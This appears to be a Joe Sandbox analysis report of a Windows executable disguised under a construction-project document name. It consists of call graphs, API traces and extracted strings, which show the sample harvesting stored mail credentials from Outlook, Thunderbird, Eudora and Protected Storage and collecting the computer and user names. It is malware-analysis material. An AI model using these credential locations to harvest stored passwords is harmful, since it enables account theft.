                                                                                                                          Total number of Limit Nodes:22
qsort 33258->33259 33259->33256 33842 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33265->33842 33267 40b00e 33268 40b016 33267->33268 33269 40b01f GetStdHandle 33267->33269 33843 406d1a CreateFileA 33268->33843 33271 40b01c 33269->33271 33272 40b035 33271->33272 33273 40b12d 33271->33273 33844 406c62 LoadCursorA SetCursor 33272->33844 33848 406d77 9 API calls 33273->33848 33276 40b136 33287 40c580 28 API calls 33276->33287 33277 40b042 33278 40b087 33277->33278 33284 40b0a1 33277->33284 33845 40a57c strlen WriteFile 33277->33845 33278->33284 33846 40a699 12 API calls 33278->33846 33281 40b0d6 33282 40b116 CloseHandle 33281->33282 33283 40b11f SetCursor 33281->33283 33282->33283 33283->33276 33284->33281 33847 406d77 9 API calls 33284->33847 33286->33115 33287->33118 33300 409a32 33288->33300 33291 409c80 memcpy memcpy 33292 409cda 33291->33292 33292->33291 33293 409d18 ??2@YAPAXI ??2@YAPAXI 33292->33293 33294 408db6 12 API calls 33292->33294 33295 409d54 ??2@YAPAXI 33293->33295 33297 409d8b 33293->33297 33294->33292 33295->33297 33297->33297 33310 409b9c 33297->33310 33299 4023c1 33299->33200 33301 409a44 33300->33301 33302 409a3d ??3@YAXPAX 33300->33302 33303 409a52 33301->33303 33304 409a4b ??3@YAXPAX 33301->33304 33302->33301 33305 409a63 33303->33305 33306 409a5c ??3@YAXPAX 33303->33306 33304->33303 33307 409a83 ??2@YAPAXI ??2@YAPAXI 33305->33307 33308 409a73 ??3@YAXPAX 33305->33308 33309 409a7c ??3@YAXPAX 33305->33309 33306->33305 33307->33291 33308->33309 33309->33307 33311 407a55 free 33310->33311 33312 409ba5 33311->33312 33313 407a55 free 33312->33313 33314 409bad 33313->33314 33315 407a55 free 33314->33315 33316 409bb5 33315->33316 33317 407a55 free 33316->33317 33318 409bbd 33317->33318 33319 407a1f 4 API calls 33318->33319 33320 409bd0 33319->33320 33321 407a1f 4 API calls 33320->33321 33322 409bda 33321->33322 33323 407a1f 4 API calls 33322->33323 33324 409be4 33323->33324 33325 407a1f 4 API calls 33324->33325 33326 409bee 33325->33326 33326->33299 33328 
410d0e 2 API calls 33327->33328 33329 410dca 33328->33329 33330 410dfd memset 33329->33330 33369 4070ae 33329->33369 33331 410e1d 33330->33331 33372 410a9c RegOpenKeyExA 33331->33372 33335 401e9e strlen strlen 33335->33203 33335->33204 33336 410e4a 33337 410e7f _mbscpy 33336->33337 33373 410d3d _mbscpy 33336->33373 33337->33335 33339 410e5b 33374 410add RegQueryValueExA 33339->33374 33341 410e73 RegCloseKey 33341->33337 33342->33207 33343->33213 33375 410a9c RegOpenKeyExA 33344->33375 33346 401c4c 33347 401cad 33346->33347 33376 410add RegQueryValueExA 33346->33376 33347->33216 33347->33218 33349 401c6a 33350 401c71 strchr 33349->33350 33351 401ca4 RegCloseKey 33349->33351 33350->33351 33352 401c85 strchr 33350->33352 33351->33347 33352->33351 33353 401c94 33352->33353 33377 406f06 strlen 33353->33377 33355 401ca1 33355->33351 33356->33219 33357->33204 33358->33211 33359->33235 33380 410a9c RegOpenKeyExA 33360->33380 33362 410b34 33363 410b5d 33362->33363 33381 410add RegQueryValueExA 33362->33381 33363->33235 33365 410b4c RegCloseKey 33365->33363 33367->33235 33368->33224 33370 4070bd GetVersionExA 33369->33370 33371 4070ce 33369->33371 33370->33371 33371->33330 33371->33335 33372->33336 33373->33339 33374->33341 33375->33346 33376->33349 33378 406f17 33377->33378 33379 406f1a memcpy 33377->33379 33378->33379 33379->33355 33380->33362 33381->33365 33383 409b40 33382->33383 33385 409b4e 33382->33385 33390 409901 memset SendMessageA 33383->33390 33386 409b99 33385->33386 33387 409b8b 33385->33387 33386->33248 33391 409868 SendMessageA 33387->33391 33389->33244 33390->33385 33391->33386 33392->33251 33393->33254 33395 4047a3 33394->33395 33396 404799 FreeLibrary 33394->33396 33395->33254 33396->33395 33398 4107f1 FreeLibrary 33397->33398 33399 403c30 LoadLibraryA 33398->33399 33400 403c74 33399->33400 33401 403c44 GetProcAddress 33399->33401 33403 4107f1 FreeLibrary 33400->33403 33401->33400 33402 403c5e 33401->33402 33402->33400 33406 403c6b 33402->33406 33404 
403c7b 33403->33404 33405 404734 3 API calls 33404->33405 33407 403c86 33405->33407 33406->33404 33485 4036e5 33407->33485 33410 4036e5 27 API calls 33411 403c9a 33410->33411 33412 4036e5 27 API calls 33411->33412 33413 403ca4 33412->33413 33414 4036e5 27 API calls 33413->33414 33415 403cae 33414->33415 33497 4085d2 33415->33497 33423 403ce5 33424 403cf7 33423->33424 33678 402bd1 40 API calls 33423->33678 33543 410a9c RegOpenKeyExA 33424->33543 33427 403d0a 33428 403d1c 33427->33428 33679 402bd1 40 API calls 33427->33679 33544 402c5d 33428->33544 33432 4070ae GetVersionExA 33433 403d31 33432->33433 33562 410a9c RegOpenKeyExA 33433->33562 33435 403d51 33436 403d61 33435->33436 33680 402b22 47 API calls 33435->33680 33563 410a9c RegOpenKeyExA 33436->33563 33439 403d87 33440 403d97 33439->33440 33681 402b22 47 API calls 33439->33681 33564 410a9c RegOpenKeyExA 33440->33564 33443 403dbd 33444 403dcd 33443->33444 33682 402b22 47 API calls 33443->33682 33565 410808 33444->33565 33448 404785 FreeLibrary 33449 403de8 33448->33449 33569 402fdb 33449->33569 33452 402fdb 34 API calls 33453 403e00 33452->33453 33585 4032b7 33453->33585 33462 403e3b 33463 403e73 33462->33463 33464 403e46 _mbscpy 33462->33464 33632 40fb00 33463->33632 33684 40f334 334 API calls 33464->33684 33474 410807 33473->33474 33475 4107fc FreeLibrary 33473->33475 33474->33254 33475->33474 33477 404785 FreeLibrary 33476->33477 33478 40473b LoadLibraryA 33477->33478 33479 40474c GetProcAddress 33478->33479 33482 40476e 33478->33482 33480 404764 33479->33480 33479->33482 33480->33482 33481 404781 33481->33254 33482->33481 33483 404785 FreeLibrary 33482->33483 33483->33481 33484->33253 33486 4037c5 33485->33486 33487 4036fb 33485->33487 33486->33410 33685 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33487->33685 33489 40370e 33489->33486 33490 403716 strchr 33489->33490 33490->33486 33491 403730 33490->33491 33686 4021b6 memset 33491->33686 33493 40373f _mbscpy _mbscpy strlen 33494 4037a4 
_mbscpy 33493->33494 33495 403789 sprintf 33493->33495 33687 4023e5 16 API calls 33494->33687 33495->33494 33498 4085e2 33497->33498 33688 4082cd 11 API calls 33498->33688 33502 408600 33503 403cba 33502->33503 33504 40860b memset 33502->33504 33515 40821d 33503->33515 33691 410b62 RegEnumKeyExA 33504->33691 33506 4086d2 RegCloseKey 33506->33503 33508 408637 33508->33506 33509 40865c memset 33508->33509 33692 410a9c RegOpenKeyExA 33508->33692 33695 410b62 RegEnumKeyExA 33508->33695 33693 410add RegQueryValueExA 33509->33693 33512 408694 33694 40848b 10 API calls 33512->33694 33514 4086ab RegCloseKey 33514->33508 33696 410a9c RegOpenKeyExA 33515->33696 33517 40823f 33518 403cc6 33517->33518 33519 408246 memset 33517->33519 33527 4086e0 33518->33527 33697 410b62 RegEnumKeyExA 33519->33697 33521 4082bf RegCloseKey 33521->33518 33523 40826f 33523->33521 33698 410a9c RegOpenKeyExA 33523->33698 33699 4080ed 11 API calls 33523->33699 33700 410b62 RegEnumKeyExA 33523->33700 33526 4082a2 RegCloseKey 33526->33523 33701 4045db 33527->33701 33529 4088ef 33709 404656 33529->33709 33533 408737 wcslen 33533->33529 33539 40876a 33533->33539 33534 40877a wcsncmp 33534->33539 33536 404734 3 API calls 33536->33539 33537 404785 FreeLibrary 33537->33539 33538 408812 memset 33538->33539 33540 40883c memcpy wcschr 33538->33540 33539->33529 33539->33534 33539->33536 33539->33537 33539->33538 33539->33540 33541 4088c3 LocalFree 33539->33541 33712 40466b _mbscpy 33539->33712 33540->33539 33541->33539 33542 410a9c RegOpenKeyExA 33542->33423 33543->33427 33713 410a9c RegOpenKeyExA 33544->33713 33546 402c7a 33547 402da5 33546->33547 33548 402c87 memset 33546->33548 33547->33432 33714 410b62 RegEnumKeyExA 33548->33714 33550 402d9c RegCloseKey 33550->33547 33551 410b1e 3 API calls 33552 402ce4 memset sprintf 33551->33552 33715 410a9c RegOpenKeyExA 33552->33715 33554 402d28 33555 402d3a sprintf 33554->33555 33716 402bd1 40 API calls 33554->33716 33717 410a9c RegOpenKeyExA 33555->33717 33560 
402cb2 33560->33550 33560->33551 33561 402d9a 33560->33561 33718 402bd1 40 API calls 33560->33718 33719 410b62 RegEnumKeyExA 33560->33719 33561->33550 33562->33435 33563->33439 33564->33443 33566 410816 33565->33566 33567 4107f1 FreeLibrary 33566->33567 33568 403ddd 33567->33568 33568->33448 33720 410a9c RegOpenKeyExA 33569->33720 33571 402ff9 33572 403006 memset 33571->33572 33573 40312c 33571->33573 33721 410b62 RegEnumKeyExA 33572->33721 33573->33452 33575 403122 RegCloseKey 33575->33573 33576 410b1e 3 API calls 33577 403058 memset sprintf 33576->33577 33722 410a9c RegOpenKeyExA 33577->33722 33579 403033 33579->33575 33579->33576 33580 4030a2 memset 33579->33580 33582 410b62 RegEnumKeyExA 33579->33582 33583 4030f9 RegCloseKey 33579->33583 33724 402db3 26 API calls 33579->33724 33723 410b62 RegEnumKeyExA 33580->33723 33582->33579 33583->33579 33586 4032d5 33585->33586 33587 4033a9 33585->33587 33725 4021b6 memset 33586->33725 33600 4034e4 memset memset 33587->33600 33589 4032e1 33726 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33589->33726 33591 4032ea 33592 4032f8 memset GetPrivateProfileSectionA 33591->33592 33727 4023e5 16 API calls 33591->33727 33592->33587 33597 40332f 33592->33597 33594 40339b strlen 33594->33587 33594->33597 33596 403350 strchr 33596->33597 33597->33587 33597->33594 33728 4021b6 memset 33597->33728 33729 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33597->33729 33730 4023e5 16 API calls 33597->33730 33601 410b1e 3 API calls 33600->33601 33602 40353f 33601->33602 33603 40357f 33602->33603 33604 403546 _mbscpy 33602->33604 33608 403985 33603->33608 33731 406d55 strlen _mbscat 33604->33731 33606 403565 _mbscat 33732 4033f0 19 API calls 33606->33732 33733 40466b _mbscpy 33608->33733 33612 4039aa 33613 4039ff 33612->33613 33734 40f460 memset memset 33612->33734 33755 40f6e2 33612->33755 33771 4038e8 21 API calls 33612->33771 33615 404785 FreeLibrary 33613->33615 33616 403a0b 33615->33616 33617 4037ca memset memset 
33616->33617 33779 444551 memset 33617->33779 33619 4038e2 33619->33462 33683 40f334 334 API calls 33619->33683 33622 40382e 33623 406f06 2 API calls 33622->33623 33624 403843 33623->33624 33625 406f06 2 API calls 33624->33625 33626 403855 strchr 33625->33626 33627 403884 _mbscpy 33626->33627 33628 403897 strlen 33626->33628 33629 4038bf _mbscpy 33627->33629 33628->33629 33630 4038a4 sprintf 33628->33630 33791 4023e5 16 API calls 33629->33791 33630->33629 33633 44b090 33632->33633 33634 40fb10 RegOpenKeyExA 33633->33634 33635 403e7f 33634->33635 33636 40fb3b RegOpenKeyExA 33634->33636 33646 40f96c 33635->33646 33637 40fb55 RegQueryValueExA 33636->33637 33638 40fc2d RegCloseKey 33636->33638 33639 40fc23 RegCloseKey 33637->33639 33640 40fb84 33637->33640 33638->33635 33639->33638 33641 404734 3 API calls 33640->33641 33642 40fb91 33641->33642 33642->33639 33643 40fc19 LocalFree 33642->33643 33644 40fbdd memcpy memcpy 33642->33644 33643->33639 33796 40f802 11 API calls 33644->33796 33647 4070ae GetVersionExA 33646->33647 33648 40f98d 33647->33648 33649 4045db 7 API calls 33648->33649 33650 40f9a9 33649->33650 33653 40fae6 33650->33653 33654 40fa13 memset WideCharToMultiByte 33650->33654 33651 404656 FreeLibrary 33652 403e85 33651->33652 33658 4442ea memset 33652->33658 33653->33651 33654->33650 33655 40fa43 _strnicmp 33654->33655 33655->33650 33656 40fa5b WideCharToMultiByte 33655->33656 33656->33650 33657 40fa88 WideCharToMultiByte 33656->33657 33657->33650 33659 410dbb 9 API calls 33658->33659 33660 444329 33659->33660 33797 40759e strlen strlen 33660->33797 33665 410dbb 9 API calls 33666 444350 33665->33666 33667 40759e 3 API calls 33666->33667 33668 44435a 33667->33668 33669 444212 65 API calls 33668->33669 33670 444366 memset memset 33669->33670 33671 410b1e 3 API calls 33670->33671 33672 4443b9 ExpandEnvironmentStringsA strlen 33671->33672 33673 4443f4 _strcmpi 33672->33673 33674 4443e5 33672->33674 33675 403e91 33673->33675 33676 44440c 33673->33676 
33674->33673 33675->33254 33677 444212 65 API calls 33676->33677 33677->33675 33678->33424 33679->33428 33680->33436 33681->33440 33682->33444 33683->33462 33684->33463 33685->33489 33686->33493 33687->33486 33689 40841c 33688->33689 33690 410a9c RegOpenKeyExA 33689->33690 33690->33502 33691->33508 33692->33508 33693->33512 33694->33514 33695->33508 33696->33517 33697->33523 33698->33523 33699->33526 33700->33523 33702 404656 FreeLibrary 33701->33702 33703 4045e3 LoadLibraryA 33702->33703 33704 404651 33703->33704 33705 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33703->33705 33704->33529 33704->33533 33706 40463d 33705->33706 33707 404643 33706->33707 33708 404656 FreeLibrary 33706->33708 33707->33704 33708->33704 33710 403cd2 33709->33710 33711 40465c FreeLibrary 33709->33711 33710->33542 33711->33710 33712->33539 33713->33546 33714->33560 33715->33554 33716->33555 33717->33560 33718->33560 33719->33560 33720->33571 33721->33579 33722->33579 33723->33579 33724->33579 33725->33589 33726->33591 33727->33592 33728->33596 33729->33597 33730->33597 33731->33606 33732->33603 33733->33612 33772 4078ba 33734->33772 33737 4078ba _mbsnbcat 33738 40f5a3 RegOpenKeyExA 33737->33738 33739 40f5c3 RegQueryValueExA 33738->33739 33740 40f6d9 33738->33740 33741 40f6d0 RegCloseKey 33739->33741 33742 40f5f0 33739->33742 33740->33612 33741->33740 33742->33741 33743 40f675 33742->33743 33776 40466b _mbscpy 33742->33776 33743->33741 33777 4012ee strlen 33743->33777 33745 40f611 33747 404734 3 API calls 33745->33747 33752 40f616 33747->33752 33748 40f69e RegQueryValueExA 33748->33741 33749 40f6c1 33748->33749 33749->33741 33750 40f66a 33751 404785 FreeLibrary 33750->33751 33751->33743 33752->33750 33753 40f661 LocalFree 33752->33753 33754 40f645 memcpy 33752->33754 33753->33750 33754->33753 33778 40466b _mbscpy 33755->33778 33757 40f6fa 33758 4045db 7 API calls 33757->33758 33759 40f708 33758->33759 33761 404734 3 API calls 33759->33761 33765 40f7e2 
33759->33765 33760 404656 FreeLibrary 33762 40f7f1 33760->33762 33766 40f715 33761->33766 33763 404785 FreeLibrary 33762->33763 33764 40f7fc 33763->33764 33764->33612 33765->33760 33766->33765 33767 40f797 WideCharToMultiByte 33766->33767 33768 40f7b8 strlen 33767->33768 33769 40f7d9 LocalFree 33767->33769 33768->33769 33770 40f7c8 _mbscpy 33768->33770 33769->33765 33770->33769 33771->33612 33773 4078e6 33772->33773 33774 4078c7 _mbsnbcat 33773->33774 33775 4078ea 33773->33775 33774->33773 33775->33737 33776->33745 33777->33748 33778->33757 33792 410a9c RegOpenKeyExA 33779->33792 33781 44458b 33782 40381a 33781->33782 33793 410add RegQueryValueExA 33781->33793 33782->33619 33790 4021b6 memset 33782->33790 33784 4445a4 33785 4445dc RegCloseKey 33784->33785 33794 410add RegQueryValueExA 33784->33794 33785->33782 33787 4445c1 33787->33785 33795 444879 30 API calls 33787->33795 33789 4445da 33789->33785 33790->33622 33791->33619 33792->33781 33793->33784 33794->33787 33795->33789 33796->33643 33798 4075c9 33797->33798 33799 4075bb _mbscat 33797->33799 33800 444212 33798->33800 33799->33798 33817 407e9d 33800->33817 33803 44424d 33804 444274 33803->33804 33806 444258 33803->33806 33825 407ef8 33803->33825 33805 407e9d 9 API calls 33804->33805 33814 4442a0 33805->33814 33838 444196 52 API calls 33806->33838 33808 407ef8 9 API calls 33808->33814 33809 4442ce 33835 407f90 33809->33835 33813 407f90 FindClose 33815 4442e4 33813->33815 33814->33808 33814->33809 33816 444212 65 API calls 33814->33816 33839 407e62 strcmp strcmp 33814->33839 33815->33665 33816->33814 33818 407f90 FindClose 33817->33818 33819 407eaa 33818->33819 33820 406f06 2 API calls 33819->33820 33821 407ebd strlen strlen 33820->33821 33822 407ee1 33821->33822 33823 407eea 33821->33823 33840 4070e3 strlen _mbscat _mbscpy _mbscat 33822->33840 33823->33803 33826 407f03 FindFirstFileA 33825->33826 33827 407f24 FindNextFileA 33825->33827 33830 407f3f 33826->33830 33828 407f46 strlen strlen 33827->33828 33829 
407f3a 33827->33829 33832 407f7f 33828->33832 33833 407f76 33828->33833 33831 407f90 FindClose 33829->33831 33830->33828 33830->33832 33831->33830 33832->33803 33841 4070e3 strlen _mbscat _mbscpy _mbscat 33833->33841 33836 407fa3 33835->33836 33837 407f99 FindClose 33835->33837 33836->33813 33837->33836 33838->33803 33839->33814 33840->33823 33841->33832 33842->33267 33843->33271 33844->33277 33845->33278 33846->33284 33847->33281 33848->33276 34193 43ffc8 18 API calls 34195 4383cc 110 API calls __fprintf_l 34007 4275d3 41 API calls 34196 4153d3 22 API calls __fprintf_l 34008 444dd7 _XcptFilter 34201 4013de 15 API calls 34203 425115 111 API calls __fprintf_l 34204 43f7db 18 API calls 34207 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34011 4335ee 16 API calls __fprintf_l 34209 429fef 11 API calls 34012 444deb _exit _c_exit 34210 40bbf0 138 API calls 34015 425115 79 API calls __fprintf_l 34214 437ffa 22 API calls 34019 4021ff 14 API calls 34020 43f5fc 149 API calls 34215 40e381 9 API calls 34022 405983 40 API calls 34023 42b186 27 API calls __fprintf_l 34024 427d86 76 API calls 34025 403585 20 API calls 34027 42e58e 18 API calls __fprintf_l 34030 425115 75 API calls __fprintf_l 34032 401592 8 API calls 32934 410b92 32937 410a6b 32934->32937 32936 410bb2 32938 410a77 32937->32938 32939 410a89 GetPrivateProfileIntA 32937->32939 32942 410983 memset _itoa WritePrivateProfileStringA 32938->32942 32939->32936 32941 410a84 32941->32936 32942->32941 34219 434395 16 API calls 34034 441d9c memcmp 34221 43f79b 119 API calls 34035 40c599 43 API calls 34222 426741 87 API calls 34039 4401a6 21 API calls 34041 426da6 memcpy memset memset memcpy 34042 4335a5 15 API calls 34044 4299ab memset memset memcpy memset memset 34045 40b1ab 8 API calls 34227 425115 76 API calls __fprintf_l 34231 4113b2 18 API calls 2 library calls 34235 40a3b8 memset sprintf SendMessageA 33849 410bbc 33852 4109cf 33849->33852 33853 4109dc 33852->33853 33854 410a23 memset 
GetPrivateProfileStringA 33853->33854 33855 4109ea memset 33853->33855 33860 407646 strlen 33854->33860 33865 4075cd sprintf memcpy 33855->33865 33858 410a0c WritePrivateProfileStringA 33859 410a65 33858->33859 33861 40765a 33860->33861 33863 40765c 33860->33863 33861->33859 33862 4076a3 33862->33859 33863->33862 33866 40737c strtoul 33863->33866 33865->33858 33866->33863 34047 40b5bf memset memset _mbsicmp

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040832F
                                                                                                                          • memset.MSVCRT ref: 00408343
                                                                                                                          • memset.MSVCRT ref: 0040835F
                                                                                                                          • memset.MSVCRT ref: 00408376
                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                          • strlen.MSVCRT ref: 004083E9
                                                                                                                          • strlen.MSVCRT ref: 004083F8
                                                                                                                          • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                          • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                          • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 455 407f3f-407f44 451->455 453 407f46-407f74 strlen * 2 452->453 454 407f3a call 407f90 452->454 458 407f83 453->458 459 407f76-407f81 call 4070e3 453->459 454->455 455->453 457 407f89-407f8f 455->457 461 407f86-407f88 458->461 459->461 461->457
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                          • strlen.MSVCRT ref: 00407F5C
                                                                                                                          • strlen.MSVCRT ref: 00407F64
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                          • String ID: ACD

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00401E8B
                                                                                                                          • strlen.MSVCRT ref: 00401EA4
                                                                                                                          • strlen.MSVCRT ref: 00401EB2
                                                                                                                          • strlen.MSVCRT ref: 00401EF8
                                                                                                                          • strlen.MSVCRT ref: 00401F06
                                                                                                                          • memset.MSVCRT ref: 00401FB1
                                                                                                                          • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                          • memset.MSVCRT ref: 00402003
                                                                                                                          • sprintf.MSVCRT ref: 00402030
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • memset.MSVCRT ref: 00402086
                                                                                                                          • memset.MSVCRT ref: 0040209B
                                                                                                                          • strlen.MSVCRT ref: 004020A1
                                                                                                                          • strlen.MSVCRT ref: 004020AF
                                                                                                                          • strlen.MSVCRT ref: 004020E2
                                                                                                                          • strlen.MSVCRT ref: 004020F0
                                                                                                                          • memset.MSVCRT ref: 00402018
                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                                                                                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                                                                                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                          Strings
                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                          • pstorec.dll, xrefs: 00403C30
                                                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
